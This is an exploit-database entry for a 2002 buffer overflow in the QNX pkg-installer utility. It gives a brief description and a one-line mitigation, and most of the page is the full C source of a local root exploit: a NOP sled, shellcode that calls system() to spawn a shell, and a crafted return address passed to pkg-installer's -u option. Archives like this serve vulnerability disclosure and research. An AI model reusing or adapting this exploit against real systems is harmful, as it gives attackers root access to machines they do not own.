header-logo
Suggest Exploit
vendor:
pkg-installer
by:
badc0ded.com
7.2
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: pkg-installer
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: QNX
2002

QNX pkg-installer root exploit

It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition. The vulnerability is a result of an unbounded string copy of the argument to the "-U" commandline option of pkg-installer to a local buffer.

Mitigation:

Input validation should be used to prevent buffer overflow attacks.
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/4918/info

It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition.

The vulnerability is a result of an unbounded string copy of the argument to the "-U" commandline option of pkg-installer to a local buffer. 
*/

/* Quick and dirty QNX pkg-installer root exploit.
 * The shellcode sucks, it is longer than it has
 * to be and you need the address to system() for 
 * it to work. Yes I know I'm lazy....
 * 
 * http://www.badc0ded.com 
*/

main(int argc, char **argv)
{
   int ret=0x804786d;
   char *pret;
   char s[]="\xeb\x0e\x31\xc0\x5b"
            "\x88\x43\x2\x53\xbb"
            "\xe4\xb4\x04\x08"       //system() address
            "\xff\xd3\xe8\xed\xff"
	    "\xff\xff\x73\x68";
   char payload[2000];
   if (argc>=2)
      ret=ret-atoi(argv[1]);
   pret=&ret;
   printf("using ret %x\n",ret);
   memset(payload,0x90,1254);
   sprintf(payload+1254,"%s%s",s,pret);
   execlp("/usr/photon/bin/pkg-installer","pkg-installer","-u",payload,0);

}

Navigation

Suggest Exploit

Services By CQR